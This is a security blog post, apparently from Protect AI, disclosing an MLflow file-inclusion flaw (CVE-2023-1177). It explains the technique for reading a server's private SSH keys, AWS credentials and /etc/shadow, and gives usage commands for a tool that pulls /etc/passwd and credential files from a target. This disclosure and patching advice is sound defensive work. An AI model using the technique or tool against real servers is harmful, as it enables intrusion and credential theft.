One of the most popular tools in an ML system is MLflow (with over 13 million monthly downloads and increasing) that is used for managing end-to-end machine learning lifecycle.
Protect AI tested the security of MLflow and found a combined Local File Inclusion/Remote File Inclusion vulnerability which can lead to a complete system or cloud provider takeover. Organizations running an MLflow server are urged to update to the latest release or at least version 2.2.2 immediately. Version 2.2.1 fixes CVE-2023-1177 and version 2.2.2 fixes CVE-2023-1176.In this blog, we explore the impact of this vulnerability, how to detect it, and our process for discovering these critical impacts. If you are running MLflow, please use our free tool provided in this blog and begin patching your systems immediately. Patching your systems may be a challenge using your traditional tools, since many automated patch management systems do not enumerate or identify MLflow, and if they do, may not perform version checks.
It's critical that you upgrade to the latest version of MLflow immediately - even if your instances are not in production, and used only in development environments.
The exploitation of this vulnerability allows a remote unauthenticated attacker to read any file on the server that the user who started the MLflow server can access.
Remote code execution can be acquired by grabbing the private SSH keys or cloud service provider credentials from the MLflow server. This allows an attacker to remotely login to server or cloud resources and perform arbitrary code execution under the permissions of the credentials found.
The MLflow maintainers were extremely fast in responding to the responsible disclosure of this vulnerability with fixes delivered in mere weeks. MLflow versions after 2.1.1 are no longer vulnerable.
To check if your MLflow server is vulnerable, use our free CVE-2023-1177-scanner tool.
We started by installing MLflow, firing up the intercepting proxy BurpSuite to intercept all MLflow API calls, running an experiment to populate MLflow with data, and then starting the UI server for exploration.
# Download MLflow source to get access to their example runs
git clone https://github.com/mlflow/mlflow
# Create and enter new directory outside the mlflow/ directory
mkdir mlflowui
cd mlflowui
# Copy the example code from the MLflow source into this new directory
cp -r ../mlflow/examples/sklearn_elasticnet_wine .
# Setup a virtual environment for installing requirements
python3 -m venv venv
source venv/bin/activate
# Install mlflow in this virtual environment
pip install mlflow pandas
# Run the example experiment
mlflow run --env-manager=local sklearn_elasticnet_wine -P alpha=0.5
# Run the UI to see the experiment details
mlflow ui --host 127.0.0.1:8000
When creating experiments, it gave us the option of specifying a directory which would store the objects. This appeared to be a configurable file path as seen via the example experiment we ran:
This immediately sparked our attention as this would require perfectly implemented filtering to prevent local file include or arbitrary file overwrites. However, you cannot run an MLflow experiment remotely from the UI. Since nothing actually happens with the artifact location when you create an experiment via the UI, there are not any security considerations here. We then continued the exploration by clicking the individual experiment runs.
Clicking the run name as seen in the image above, brought us to the experiment run details where we could see the files involved in the experiment and download them as seen in the image below.
In this case, we saw a big “Register Model” button in our artifact files. We were curious.
It didn't seem to be anything particularly interesting, as it just pops up a modal that lets you select a model and then saves that model’s details as “Version 1”.
But what was happening under the hood? We checked BurpSuite.
We found another protocol and file path input that wasn’t shown to us in the UI. This seemed suspicious. We manually changed it to the user’s private SSH key file:///Users/danmcinerney/.ssh/id_rsa. Access to this file would allow you to remotely login to the MLflow host machine as the user who started the MLflow server.
The new source was reflected in the response which usually indicates a server-side change occurred. Curious about what this accomplished, we went back and browsed to the registered model details. Nothing in the experiment run artifacts, nothing interesting in the model details or the model version details, either. Seemed like another dead end similar to how we found you could point the experiment artifact path to an arbitrary location but the UI then gave you nothing to do with it. Upon reviewing the BurpSuite request and response log, however, something interesting showed up.
A 500 Internal Server Error in the get-artifact API call felt suspicious to us. The get-artifact API call was of interest early in the security testing because it’s the call that returns file data from the artifact repository. It’s how you download the model from an experiment run, and we found it was protected with a function that prevented Local File Include vulnerabilities as seen below.
We had spent some time trying to bypass this without success. The difference in this particular get-artifact call is that it’s not trying to get a file from a subfolder, rather it’s directly accessing the filename. Additionally, it’s not actually the same API call. Here’s the documented get-artifact REST API call:
And here’s the comparable model-version/get-artifact call:
The differences include URL path, parameters, and values. It’s is clearly not the same API call.
We noted that this API call isn’t in the documentation. The key difference is it’s looking directly for a filename via the path URL parameter rather than a relative file path in the legitimate get-artifact API call.
This means the LFI protection is absent because there’s no requirement to do a directory traversal. One needs only to control the source folder location. A few steps above, we tried to modify an API request’s source path location to file:///Users/danmcinerney/.ssh/id_rsa when we created a new model version:
What we should have done was change the source location to a folder not a file. We corrected that.
We then resent the undocumented REST API call found, and pointed it to id_rsa which is a file within the new model version source location and the private SSH keys which unlocks the ability to remotely login to the server.
Using this retrieved SSH key, we can gain terminal access to the host running the MLflow server. MLflow is most often configured to use an S3 bucket as an artifact store. If this is the case then another very high value target on the machine would be the ~/.aws/credentials file which, as one can imagine, stores AWS credentials.
Other high value targets could include files such web server SQL configs which contain plaintext passwords or /etc/shadow which contains all user password hashes that can be cracked via a tool such as hashcat.
To help protect your systems we have created a simple tool to surface your potential vulnerability, named MLFIflow.py
(M + LFI + flow).
Installation
git clone https://github.com/protectai/Snaike-MLflow
cd Snaike-MLflow/MLFIflow
python3 -m venv mlfiflow
source mlfiflow/bin/activate
pip install -r requirements.txt
Usage
By default, MLFIflow will attempt to read /etc/passwd from the MLflow server and use the usernames found to search for SSH keys and cloud credential files
python MLFIflow.py -s http://1.2.3.4:5000
To specify a custom wordlist of files to download, use the -f flag:
python MLFIflow.py -s http://1.2.3.4:5000 -f /path/to/wordlist.txt
We're always interested to hear from and collaborate with other security researchers interested in keeping the AI field secure. If you'd like to work together for compensated AI security research, drop me an email at dan@protectai.com.